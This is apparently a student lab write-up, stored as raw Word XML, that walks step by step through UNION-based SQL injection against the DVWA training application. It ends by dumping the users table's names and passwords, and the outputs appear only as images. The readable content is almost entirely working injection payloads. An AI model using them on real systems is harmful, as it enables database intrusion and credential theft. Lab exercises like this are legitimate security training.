    <w:p w14:paraId="5B9EB177" w14:textId="2F3DDD9C" w:rsidR="00201662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736B63BD" w14:textId="11B8855B" w:rsidR="00201662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242394A4" wp14:editId="040A1446">
            <wp:extent cx="4134427" cy="914528"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18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ompany n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AD90" w14:textId="68100F74" w:rsidR="00201662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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' UNION SELECT @@hostname, NULL#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D7D0AF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EA68994" w14:textId="55C24B83" w:rsidR="00201662" w:rsidRPr="00F05170" w:rsidRDefault="00201662" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E7ABB" w14:textId="574BB689" w:rsidR="00201662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2FC711F5" wp14:editId="0308B59B">
            <wp:extent cx="4353533" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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A18C" w14:textId="46F2D24C" w:rsidR="00201662" w:rsidRPr="00F05170" w:rsidRDefault="00201662" w:rsidP="00163D85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs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Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), @@hostname#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D0E2B" w14:textId="5E67A8D9" w:rsidR="00201662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49C56F5D" w14:textId="7448E2FB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2DEF2AB9" wp14:editId="4B46C037">
            <wp:extent cx="5001323" cy="885949"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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1B1" w14:textId="050AEDA0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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' UNION SELECT CURRENT_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USER(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), USER()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EDB74" w14:textId="0F4AB7B1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4075CD5A" w14:textId="2DA8D892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77FAFA0D" wp14:editId="7257CEE3">
            <wp:extent cx="5048955" cy="885949"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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277D" w14:textId="6D060E50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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DATABASE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), NULL#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B302334" w14:textId="37382D25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0128B12C" w14:textId="18AEF29A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7DE8444A" wp14:editId="5290D101">
            <wp:extent cx="4515480" cy="933580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 23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ompany n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C383" w14:textId="18D583D2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B172F0F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B8825BD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A9DAC41" w14:textId="13750687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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT SCHEMA_NAME, NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCB890" w14:textId="40506E88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68AD1F1C" w14:textId="1C9C89D8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3C60E748" wp14:editId="0E196E95">
            <wp:extent cx="5943600" cy="2364105"/>
            <wp:effectExtent l="0" t="0" r="0" b="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D4FD" w14:textId="29C6813B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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT TABLE_NAME, NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD102DA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4854A021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B707D81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6B7EC88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4E027FA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F5E8554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47246504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42857CD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5F507A80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16D1C65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287E63F3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EF81265" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00163D85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0FAC3F53" w14:textId="13CD1DAC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lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D2A99" w14:textId="5A63F40D" w:rsidR="00FD593A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05FF1D95" wp14:editId="407EFC74">
            <wp:extent cx="5943600" cy="6014085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715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170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and so </w:t>
      </w:r>
      <w:r w:rsidR="00F05170" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="00F05170" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F1B380" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00163D85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0ACFA119" w14:textId="4DE68E66" w:rsidR="00163D85" w:rsidRDefault="00FD593A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</w:p>
    <w:p w14:paraId="20031D54" w14:textId="053CDBF9" w:rsidR="00FD593A" w:rsidRPr="00F05170" w:rsidRDefault="00FD593A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' UNION SELECT TABLE_NAME, NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288D098" w14:textId="77777777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TABLE_SCHEMA='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B73015" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB29CCA" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00FD593A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7AD57525" wp14:editId="69FBFE1B">
            <wp:extent cx="5943600" cy="93535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170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC7FCE" w14:textId="6B35DC01" w:rsidR="00FD593A" w:rsidRPr="00F05170" w:rsidRDefault="00FD593A" w:rsidP="00163D85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' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COLUMN_NAME, 0x0A, DATA_TYPE), CHARACTER_MAXIMUM_LENGTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FC413" w14:textId="77777777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FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='users'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4991D642" w14:textId="77777777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06B8B692" w14:textId="6788AD32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17F7A717" wp14:editId="382466CE">
            <wp:extent cx="5943600" cy="3606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32E4" w14:textId="77777777" w:rsidR="00163D85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Input: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0169587F" w14:textId="7440B914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 xml:space="preserve">' UNION SELECT first_name, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user, 0x0A, password) FROM users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1589D38A" w14:textId="64D11771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t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D302E" w14:textId="255AC171" w:rsidR="00FD593A" w:rsidRPr="00F05170" w:rsidRDefault="00FD593A" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BBD961" wp14:editId="39EFFCF8">
            <wp:extent cx="5221224" cy="3214734"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="28" name="Picture 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529" cy="32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5DEA" w14:textId="6C9D6845" w:rsidR="00201662" w:rsidRPr="00F05170" w:rsidRDefault="00201662" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00201662" w:rsidRPr="00F05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590E5" w14:textId="77777777" w:rsidR="00077CAC" w:rsidRDefault="00077CAC" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78C894BE" w14:textId="77777777" w:rsidR="00077CAC" w:rsidRDefault="00077CAC" w:rsidP="00163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BB740" w14:textId="77777777" w:rsidR="00077CAC" w:rsidRDefault="00077CAC" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6DF053F1" w14:textId="77777777" w:rsidR="00077CAC" w:rsidRDefault="00077CAC" w:rsidP="00163D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6FD"/>
    <w:rsid w:val="00077CAC"/>
    <w:rsid w:val="00150168"/>
    <w:rsid w:val="00163D85"/>
    <w:rsid w:val="00201662"/>
    <w:rsid w:val="00477EB8"/>
    <w:rsid w:val="005C3370"/>
    <w:rsid w:val="0070134E"/>
    <w:rsid w:val="007B36FD"/>
    <w:rsid w:val="00AB745E"/>
    <w:rsid w:val="00EF7F60"/>
    <w:rsid w:val="00F05170"/>
    <w:rsid w:val="00FD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EF52B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3E5673DB-0E82-48FD-816E-BB906D6C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D85"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00163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Olsovsky</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jakub Olsovsky</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-16T00:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-16T00:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>